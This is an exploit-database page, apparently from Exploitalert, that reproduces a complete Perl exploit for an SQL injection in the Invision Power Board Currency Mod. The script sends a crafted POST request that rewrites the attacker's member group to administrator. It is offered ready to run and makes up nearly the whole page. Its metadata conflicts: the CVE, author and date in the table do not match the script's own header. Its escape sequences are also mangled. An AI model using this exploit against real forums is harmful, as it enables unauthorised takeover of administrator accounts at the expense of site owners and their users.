Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2005-1906 | CWE-89 | $100 - $300 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
NitroSecurity | High | Remote | 2010-03-16 |
# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection # Date: 17/04/2007 # Author: Pr0T3cT10n # Software Link: www.invisionpower.com<http://www.invisionpower.com> # Version: 1.3 # Tested on: 1.3 # CVE: # Code: #!/usr/bin/perl ######################################################################### # Invision Power Board Currency Mod(edit) SQL injection. # # Bug found by Pr0T3cT10n, [email protected]<mailto:[email protected]> # # The exploit is updating your user to an admin account # # **YOU SHOULD HAVE CURRENCY EDIT ACCESS!** # ######################################################################### use IO::Socket; use Digest::MD5 qw(md5_hex); $host = $ARGV[0]; $path = $ARGV[1]; $id = $ARGV[2]; $passwd = $ARGV[3]; if(!$ARGV[3]) { print "#################################################n"; print "## IPB Currency Mod SQL injection Exploit. ##n"; print "## Discoverd By Pr0T3cT10n. ##n"; print "#################################################n"; print "$0 [host] [path] [your id] [your passowrd]n"; print "$0 host.com /forum 567 123456n"; print "#################################################n"; exit(); } print "[~] Connecting $host:80...n"; $socket = IO::Socket::INET->new( Proto => "tcp" , PeerAddr => $host , PeerPort => "80") or die("[-] Connection faild.n"); print "[+] Connected.n[~] Sending POST information...n"; $pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1rn"; $pack.= "Host: " . $host . "rn"; $pack.= "User-Agent: No_Agentrn"; $pack.= "Accept: */*rn"; $pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "rn"; $pack.= "Keep-Alive: 300rn"; $pack.= "Connection: keep-alivern"; $pack.= "Content-Type: application/x-www-form-urlencodedrn"; $pack.= "Content-Length: 24rnrn"; $pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id' print $socket $pack; while($res = <$socket>) { if($res =~ /<table align='center' cellpadding="4" class="tablefill">/) { print("[+] succeed.n"); exit(); } } print("[-] Faild.n"); exit();
Copyright ©2024 Exploitalert.